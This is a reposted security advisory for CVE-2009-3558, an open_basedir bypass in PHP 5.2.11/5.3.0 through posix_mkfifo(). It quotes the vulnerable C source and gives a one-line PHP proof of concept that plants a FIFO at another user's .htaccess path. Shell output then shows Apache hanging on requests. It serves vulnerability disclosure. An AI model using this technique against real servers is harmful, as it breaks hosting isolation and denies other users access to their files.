PHP 5.3.0 5.2.11 posix_mkfifo() open_basedir bypass

2009-09-29 / 2009-09-30
Credit: Grzegorz Stachowiak
Risk: High
Local: Yes
Remote: No
CVE: CVE-2009-3558
CWE: CWE-264


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ] Author: Grzegorz Stachowiak Date: - - Dis.: 25.09.2009 - - Pub.: 29.09.2009 Risk: Low Affected Software: - - PHP 5.3.0 - - PHP 5.2.11 and prior - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. http://lu2.php.net/manual/en/function.posix-mkfifo.php - --- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass --- posix_mkfifo &#8212; Create a fifo special file (a named pipe) posix_mkfifo() creates a special FIFO file which exists in the file system and acts as a bidirectional communication endpoint for processes. Function not check open_basedir value, so we can create any file in any writable folder, if open_basedir is enabled. We can "freeze" Apache and prevent access to any writable folder. - ---ext/posix/posix.c--- PHP_FUNCTION(posix_mkfifo) { char *path; int path_len; long mode; int result; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path, &path_len, &mode) == FAILURE) { RETURN_FALSE; } if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR))) { [1] RETURN_FALSE; } result = mkfifo(path, mode); if (result < 0) { POSIX_G(last_error) = errno; RETURN_FALSE; } RETURN_TRUE; } - ---ext/standard/file.c--- [1]. Function posix_mkfifo check only safe_mode value. - ---example0 (5.2.11/5.3.0)--- x@x-desktop:/var/www/$ php -v PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies |----------------------------------------------------------------| x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL; /var/www:/tmp x@x-desktop:/var/www$ |----------------------------------------------------------------| x@x-desktop:/var/www$ cat fifo.php <? posix_mkfifo('/home/y/www/.htaccess',0777); ?> |----------------------------------------------------------------| x@x-desktop:/var/www$ wget http://localhost/config.txt --17:39:31-- http://localhost:80/config.txt => `config.txt' Connecting to localhost:80... connected! HTTP request sent, awaiting response... 200 OK Length: 25 [text/plain] 0K -> [100%] (24.41 KB/s) - `config.txt' saved [25/25] |----------------------------------------------------------------| x@x-desktop:/var/www$ php fifo.php x@x-desktop:/var/www$ |----------------------------------------------------------------| x@x-desktop:/var/www$ wget http://localhost/config.txt --17:39:43-- http://localhost:80/config.txt => `config.txt' Connecting to localhost:80... connected! HTTP request sent, awaiting response... |----------------------------------------------------------------| Apache try receive access to .htaccess file, but fifo special file not allow a "normal" read, so we can't read files in this directory and all subdirectories. - --- 3. Contact --- Author: Grzegorz Stachowiak Email: stachowiak {a|t} analogicode.pl

References:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/posix/posix.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/posix/posix.c?view=log


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top